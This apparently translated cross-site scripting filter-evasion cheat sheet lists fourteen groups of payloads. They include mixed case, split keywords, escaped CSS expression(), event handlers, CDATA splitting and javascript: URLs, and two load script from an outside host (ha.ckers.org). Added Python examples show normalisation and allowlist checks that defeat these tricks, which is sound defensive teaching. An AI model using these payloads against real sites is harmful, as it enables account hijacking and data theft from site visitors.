1. Change the letter case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace the .js extension with another one

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> new line

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

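Sections 7 and 8 work because a pattern match on the raw attribute value sees the keyword broken up by backslashes, comments or hex escapes, while the browser's CSS parser does not. The following is an added example, not code from the original post: a small string-aware normaliser that decodes CSS backslash escapes and strips comments, so that any check runs on what the parser would actually see. All sample values are constructed from the patterns above.

```python
import re

_HEX = re.compile(r"([0-9a-fA-F]{1,6})[ \t\n\r\f]?")   # \ + 1..6 hex digits (+ one whitespace eaten)
_DANGEROUS = re.compile(r"expression\s*\(|javascript\s*:")  # IE expression() and javascript: URLs

def normalize_css(value: str) -> str:
    """Value as a CSS tokenizer sees it: comments removed, backslash escapes
    decoded, case folded. Quote state is tracked because '/*' inside a string
    is literal text, not a comment."""
    out, i, n, quote = [], 0, len(value), None
    while i < n:
        c = value[i]
        if quote is None and value.startswith("/*", i):
            end = value.find("*/", i + 2)
            i = n if end < 0 else end + 2        # unterminated comment eats the rest
            continue
        if c == "\\" and i + 1 < n:
            m = _HEX.match(value, i + 1)
            if m:                                 # \6a  -> 'j'
                out.append(chr(int(m.group(1), 16)))
                i = m.end()
            else:                                 # \s   -> 's'
                out.append(value[i + 1])
                i += 2
            continue
        if c in "\"'":
            quote = None if quote == c else (quote or c)
        out.append(c)
        i += 1
    return "".join(out).lower()

def style_value_is_safe(value: str) -> bool:
    return _DANGEROUS.search(normalize_css(value)) is None

# Constructed samples: the section 7/8 patterns plus one harmless declaration.
SAMPLES = {
    "width: 100px; color: red": True,
    r'xss:expre\ssion(alert("XSS33"))': False,
    r"xss:expr/*anyword*/ession(alert('sss'))": False,
    r"width: expre\ssi\on(alert('XSS31'))": False,
    r'no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))': False,
    r"background-image: url('\6a avascript:alert(1)')": False,   # \6a is 'j'
}

def misclassified() -> list:
    """Samples whose verdict differs from the expected one; empty when the check holds."""
    return [v for v, ok in SAMPLES.items() if style_value_is_safe(v) != ok]
```

The same normalisation step is what a filter needs before it can reason about a style value at all; without it, every payload in sections 7 and 8 passes a plain substring check.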
9. Script in an HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside a SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart, then reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
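Sections 1, 2, 6 and 14 all target the same weak design: a blacklist regex run over the raw attribute value. The following is an added example, not code from the original post: a defender-side comparison between such a regex and a scheme allowlist that first normalises the value the way a browser does (entity decoding, stripping the ASCII whitespace and control characters a browser ignores inside a scheme, case folding). All sample values are constructed.

```python
import html
import re
from urllib.parse import urlsplit

# A blacklist regex of the kind sections 1, 2 and 6 are built to slip past.
NAIVE = re.compile(r"javascript:")

def naive_filter_rejects(value: str) -> bool:
    return NAIVE.search(value) is not None

ALLOWED_SCHEMES = {"http", "https", "mailto"}

def url_attribute_is_safe(value: str) -> bool:
    """Allowlist check on the scheme a browser would actually resolve:
    decode HTML entities, remove the ASCII controls and whitespace that
    browsers ignore inside a scheme, fold case, then accept only
    relative URLs or known-good schemes."""
    decoded = html.unescape(value)                   # &#106;avascript: -> javascript:
    cleaned = re.sub(r"[\x00-\x20]", "", decoded)    # jav<TAB>ascr<LF>ipt: -> javascript:
    scheme = urlsplit(cleaned).scheme.lower()        # JaVaScRiPt -> javascript
    return scheme == "" or scheme in ALLOWED_SCHEMES

# Constructed samples: benign URLs plus the evasion patterns from this page.
SAMPLES = {
    "https://example.com/t.js": True,
    "/images/logo.png": True,
    "javascript:alert('XSS3')": False,
    "jav\tascr\nipt:alert('XSS3')": False,           # section 6: tab and newline
    "JaVaScRiPt:alert('XSS')": False,                # section 1: mixed case
    "&#106;avascript:alert('XSS')": False,           # section 8: entity-encoded 'j'
    " \x00java\rscript:alert(1)": False,             # leading space, NUL, CR
}

def compare_filters():
    """Return (payloads the naive regex lets through, samples the allowlist gets wrong)."""
    naive_misses = [v for v, ok in SAMPLES.items() if not ok and not naive_filter_rejects(v)]
    allowlist_errors = [v for v, ok in SAMPLES.items() if url_attribute_is_safe(v) != ok]
    return naive_misses, allowlist_errors
```

The naive regex catches only the one literal `javascript:` sample; the allowlist rejects every evasion variant because it decides on the normalised scheme rather than on the bytes the filter happens to see.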